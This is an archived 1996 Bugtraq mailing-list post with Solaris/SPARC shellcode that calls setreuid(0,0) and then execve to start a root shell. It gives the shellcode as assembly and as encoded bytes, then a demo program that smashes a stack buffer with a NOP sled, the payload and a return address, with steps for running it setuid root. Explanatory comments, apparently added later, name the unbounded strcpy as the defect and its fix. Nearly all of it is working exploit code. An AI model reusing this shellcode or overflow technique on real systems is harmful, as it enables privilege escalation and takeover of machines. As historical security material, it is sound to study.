Bugtraq mailing list archives

Re: /bin/ksh sparc code


From: aaronb () j51 com (Aaron Bornstein)
Date: Tue, 3 Dec 1996 15:18:19 -0500


Our good buddy Kichang wrote the following:
So, I made sparc code for doing something *like* execl("/bin/ksh","ksh",0).
I know it's no big deal, almost close to lame, but I think it's kinda

        That's one way to do it, but I don't like ksh.  So, I decided to
modify it to do a setreuid() call before anything else.  Here's the code:

        --CUT HERE--solaris-setreuid-shellcode.c--CUT HERE--
/* Solaris */
/*
 * Historical (1996) Solaris/SPARC proof-of-concept posted to Bugtraq.
 * The inline assembly issues system call 0xca (202, setreuid, per the
 * original comment) and then system call 0x3b (59, execve); both are
 * entered with `ta 8`. The instruction text is kept byte-for-byte as
 * published. `main()` is written without a return type (implicit int,
 * pre-C99 style), and if the final execve succeeds control never comes
 * back to this function.
 */
main() {
__asm__ (
        "mov     0xca, %g1 \n"          /* 202 - setreuid() */
        "xor     %o1,%o1,%o1 \n"
        "and     %o1,%o1,%o0 \n"
        "ta      8 \n"                  /* trap into the kernel: setreuid */
        "sethi   0xbd89a, %l6 \n"
        "or      %l6, 0x16e, %l6 \n"
        "sethi   0xbdcda, %l7 \n"
        "and     %sp, %sp, %o0 \n"
        "add     %sp, 8, %o1 \n"
        "xor     %o2, %o2, %o2 \n"
        "add     %sp, 16, %sp \n"
        "std     %l6, [%sp - 16] \n"
        "st      %sp, [%sp - 8] \n"
        "st      %g0, [%sp - 4] \n"
        "mov     0x3b, %g1 \n"          /* 59 - execve() */
        "ta      8 \n"                  /* trap into the kernel: execve */
        );
}
        --CUT HERE--solaris-setreuid-shellcode.c--CUT HERE--


        And a demonstration program.  Usage:

# cc -o demo demo.c
# chmod 4755 demo
# su plainuser
% ./demo
#

        --CUT HERE--solaris-shellcode-example1.c--CUT HERE--
#include <sys/types.h>

/* One SPARC instruction word used as no-op padding ahead of the payload. */
#define NOP      0xa61cc013
/* Size of the fixed stack buffer (lilbuf) that overflow_me() overruns. */
#define BUFSIZE  256
/* Length in bytes of shellcode[] below (4 rows of 16 escaped bytes). */
#define CODESIZE 64

/*
 * Byte encoding corresponding to the inline assembly published above
 * (solaris-setreuid-shellcode.c): the first four bytes encode the
 * `mov 0xca, %g1` that opens that listing and the last four the closing
 * `ta 8`. Kept verbatim as posted; it is Solaris/SPARC-specific.
 */
char shellcode[] =
"\x82\x10\x20\xca\x92\x1a\x40\x09\x90\x0a\x40\x09\x91\xd0\x20\x08"
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08";


/*
 * Staging buffer built by overflow_me(): twice BUFSIZE so that copying it
 * into a BUFSIZE-byte stack buffer overruns that buffer. As a global it
 * starts zero-filled, but overflow_me() writes every byte of it before the
 * copy (assuming a 4-byte u_long), so no NUL terminator remains inside it.
 */
char bigbuf[BUFSIZE * 2];

/*
 * Returns the current stack pointer, read with SPARC inline assembly.
 * There is no C `return` statement: the asm copies %sp into %i0, the
 * register a callee's return value is taken from under the SPARC calling
 * convention, so the result depends on the compiler leaving %i0 untouched
 * afterwards (compiler- and optimisation-level dependent, not portable C).
 */
u_long
get_sp()
{
  __asm__("mov %sp, %i0 \n");
}

/*
 * Demonstrates the classic stack-smashing defect: bigbuf (2 * BUFSIZE
 * bytes) is copied with an unbounded strcpy() into lilbuf, which holds only
 * BUFSIZE bytes, so the copy can run past lilbuf into the rest of the
 * stack frame. bigbuf is laid out in three regions before the copy:
 *   [0, BUFSIZE - CODESIZE)       NOP instruction words
 *   [BUFSIZE - CODESIZE, BUFSIZE) the shellcode[] bytes
 *   [BUFSIZE, 2 * BUFSIZE)        stack addresses (get_sp() + 224)
 * The constant 224 is tied to this exact frame layout (compiler, flags and
 * the locals declared here); any edit to this function changes it.
 *
 * NOTE(review): the file shown includes only <sys/types.h>, so strcpy() is
 * used without <string.h> (an implicit declaration). The root cause on the
 * defensive side is the unbounded copy: a length-checked copy bounded by
 * sizeof lilbuf removes it, and stack protection / non-executable stacks
 * catch the rest.
 */
void
overflow_me()
{
  char    lilbuf[BUFSIZE];
  u_long  *lp;
  char    *cp;
  int     i;

  lp = (u_long *)bigbuf;

  /* Region 1: NOP words (one store per 4 bytes). */
  for (i = 0 ; i < BUFSIZE - CODESIZE ; i += 4)
    *lp++ = NOP;

  cp = (char *)lp;

  /* Region 2: the payload bytes, copied one at a time. */
  for (i = 0 ; i < CODESIZE ; i++)
    *cp++ = shellcode[i];

  /* Region 3: a stack address repeated to the end of bigbuf. With a 4-byte
   * u_long this writes bigbuf[BUFSIZE .. 2*BUFSIZE) exactly, leaving no NUL
   * inside bigbuf unless an address value happens to contain a zero byte;
   * strcpy() below then reads past bigbuf until it finds one (undefined
   * behaviour in the demo itself) — NOTE(review): worth confirming. */
  lp = (u_long *)cp;
  for (i = BUFSIZE ; i < BUFSIZE * 2 ; i += 4)
/*    *lp++ = (u_long)lilbuf;   */
    *lp++ = get_sp() + 224;

  /* The defect: no bound on the copy into the BUFSIZE-byte lilbuf. */
  strcpy(lilbuf, bigbuf);
}

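/*
 * Entry point for the demo: simply triggers the overflow.
 * The original declared `void main`, which is not a valid C signature for
 * main; it now returns int. argc/argv are unused but kept so the signature
 * stays as posted.
 */
int
main(int argc, char **argv)
{
  (void)argc;
  (void)argv;
  overflow_me();
  return 0;
}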
        --CUT HERE--solaris-shellcode-example1.c--CUT HERE--


